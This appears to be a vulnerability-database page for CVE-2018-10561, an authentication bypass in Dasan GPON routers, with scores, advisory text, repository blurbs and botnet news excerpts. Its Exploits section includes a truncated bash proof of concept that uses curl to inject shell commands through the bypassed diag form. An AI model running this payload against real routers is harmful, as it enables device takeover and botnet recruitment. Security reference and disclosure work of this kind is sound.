CVE-2018-10561

Published: 04/05/2018 Updated: 04/03/2019
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 760
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

An issue exists on Dasan GPON home routers. It is possible to bypass authentication simply by appending "?images" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device.

Affected Products

Vendor: Dasannetworks | Product: Gpon Router Firmware | Versions: -

Vendor Advisories

Summary: Multiple GPON Home Routers could allow a remote attacker to bypass security restrictions, caused by a flaw in the authentication mechanism. By appending "?images/" to the end of the web address on any of the router's configuration pages, an attacker could exploit this vulnerability to bypass the router's login page and gain complete access ...

Exploits

#!/bin/bash
echo "[+] Sending the Command… "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiti ...

Github Repositories

RCE on GPON home routers (CVE-2018-10561). Press: The Hacker News - 1, The Hacker News - 2, KitPloit, Security Affairs. Vulnerability: Many routers today use GPON internet, and a way to bypass all authentication on the devices (CVE-2018-10561) was found by VPNMentor. With this authentication bypass, it's also possible to unveil another command injection vulnerability (CVE-2018-1

This is the official repository for the UnderattackToday Python module. UnderattackToday: Underattack is a free security intelligence platform. For more information please visit underattacktoday. API: Underattack provides a free API described here: portalunderattacktoday/api/docs. To use it you should register to the portal, it's free :) The Python module

CVE-2018-10562 exploit. About: RCE on GPON home routers. [*] CVE-2018-10561: Authentication Bypass. [*] CVE-2018-10562: Command Injection. Dependencies required: requests, urllib2, ssl, re.

ABOUT: Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. FEATURES: Automatically collects basic recon (i.e. whois, ping, DNS, etc.); automatically launches Google hacking queries against a target domain; automatically enumerates open ports via NMap port scanning; automatically brute forces sub-doma

GreyNoise Intelligence Alpha API. Summary: GreyNoise is a system that collects and analyzes data on Internet-wide scanners. GreyNoise collects data on benign scanners such as Shodan.io, as well as malicious actors like SSH and telnet worms. The data is collected by a network of sensors deployed around the Internet in various datacenters, cloud providers, and regions. URL: https:

ABOUT: Kn0ck is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. KN0CK FEATURES: Automatically collects basic recon; automatically launches Google hacking queries against a target domain; automatically enumerates open ports via NMap port scanning; automatically brute forces sub-domains, gathers DNS info and checks f

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding

Awesome CVE PoC: A curated list of CVE PoCs. Here is a collection about Proof of Concepts of Common Vulnerabilities and Exposures, and you may also want to check out awesome-web-security. Please read the contribution guidelines before contributing. This repo is full of PoCs for CVEs. If you enjoy this awesome list and would like to support it, check out my Patreon page :

Recent Articles

Wicked Botnet Uses Passel of Exploits to Target IoT
Threatpost • Tara Seals • 21 May 2018

Yet another variant of the Mirai botnet has appeared on the scene, but this one has a twist: The code is integrated with at least three exploits that target unpatched IoT devices, including closed-circuit cameras and Netgear routers. It also has ties to a web of other botnets, made for DDoS attacks, which can all be traced back to one threat actor.
The original Mirai used traditional brute-force attempts to gain access to connected things in order to enslave them, but the Wicked Botnet, na...

GPON Routers Attacked With New Zero-Day
BleepingComputer • Catalin Cimpanu • 21 May 2018

Attacks on Dasan GPON routers are continuing to happen using two vulnerabilities disclosed last month, but today, researchers from Qihoo 360 Netlab have revealed that one botnet operator appears to have deployed a new zero-day affecting the same router types.
The security firm has refused to release further details on this flaw to prevent more attacks but said it was able to reproduce its effects.
"We tested this payload on two different versions of [Dasan] GPON home router," the Net...

Botnet Party on GPON Routers
BleepingComputer • Catalin Cimpanu • 10 May 2018

At least five IoT botnets are fighting each other and attempting to infect Dasan GPON routers, according to Chinese cyber-security firm Qihoo 360 Netlab.
The five botnets are known under codenames such as Hajime, Mettle, Mirai, Muhstik, and Satori.
The devices they are trying to take over are GPON-capable routers manufactured by South Korean vendor Dasan. GPON stands for Gigabit Passive Optical Network and is a type of telecommunications technology for supporting internet connections...

Vulnerabilities Affecting Over One Million Dasan GPON Routers Are Now Under Attack
BleepingComputer • Catalin Cimpanu • 04 May 2018

Two vulnerabilities affecting over one million routers, and disclosed earlier this week, are now under attack by botnet herders, who are trying to gather the vulnerable devices under their control.
Attacks started yesterday, Thursday, May 3, according to Netlab, the network security division of Chinese cyber-security vendor Qihoo 360.
Exploitation of these two flaws started after on Monday, April 30, an anonymous researcher published details of the two vulnerabilities via the VPNMent...

Millions of Home Fiber Routers Vulnerable to Complete Takeover
Threatpost • Tara Seals • 01 May 2018

UPDATE
Consumers lucky enough to have blazing-fast 1Gbps internet access in their homes are likely to use the internet more than lower-broadband households; however, millions of them are at risk for hackers to gain wide-ranging access to their internet activities (including being able to view full browsing histories).
A comprehensive assessment of various GPON home routers by vpnMentor has uncovered a way to bypass all authentication on the devices (CVE-2018-10561). That flaw can be ...